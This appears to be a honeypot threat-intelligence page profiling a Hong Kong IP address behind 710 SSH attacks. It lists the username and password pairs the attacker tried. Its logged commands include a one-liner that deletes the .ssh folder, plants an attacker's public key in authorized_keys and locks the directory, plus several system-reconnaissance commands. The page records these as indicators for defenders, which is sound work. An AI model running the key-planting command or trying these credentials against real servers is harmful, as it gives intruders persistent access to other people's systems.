Active Threat โ€ข MEDIUM

165.154.6.89

First Detection2/19/2026
Last Activity2/20/2026
ISPUCLOUD INFORMATION TECHNOLOGY HK LIMITED
๐ŸŽฏ
710
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
27
Malware

Geolocation

Country
๐Ÿ‡ญ๐Ÿ‡ฐ Hong Kong
City
Hong Kong
ASN
AS135377
ISP
UCLOUD INFORMATION TECHNOLOGY HK LIMITED

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”345gs5662d34/345gs5662d34
10x
๐Ÿ”claude/claude123
4x
๐Ÿ”root/09N1RCa1Hs31
3x
๐Ÿ”root/LeitboGi0ro
3x
๐Ÿ”oracle/Bmw_20!_^
3x
๐Ÿ”n8n/n8n
3x
๐Ÿ”root/3245gs5662d34
3x
๐Ÿ”root/nPSpP4PBW0
3x
๐Ÿ”n8n/3245gs5662d34
2x
๐Ÿ”ubuntu/drag0n
2x
๐Ÿ”bijuan/bijuan123
2x
๐Ÿ”yifan/123456
2x
๐Ÿ”ubuntu/aA.123456
2x
๐Ÿ”azureuser/1234567
2x
๐Ÿ”ubuntu/3245gs5662d34
2x

Executed Commands

$lockr -ia .ssh10x
$cd ~; chattr -ia .ssh; lockr -ia .ssh8x
$Enter new UNIX password:8x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~7x
$cat /proc/cpuinfo | grep name | wc -l5x
$crontab -l5x
$whoami4x
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'4x
$lscpu | grep Model4x
$uname -a4x

Risk Assessment

55
/100
LowMediumHighCritical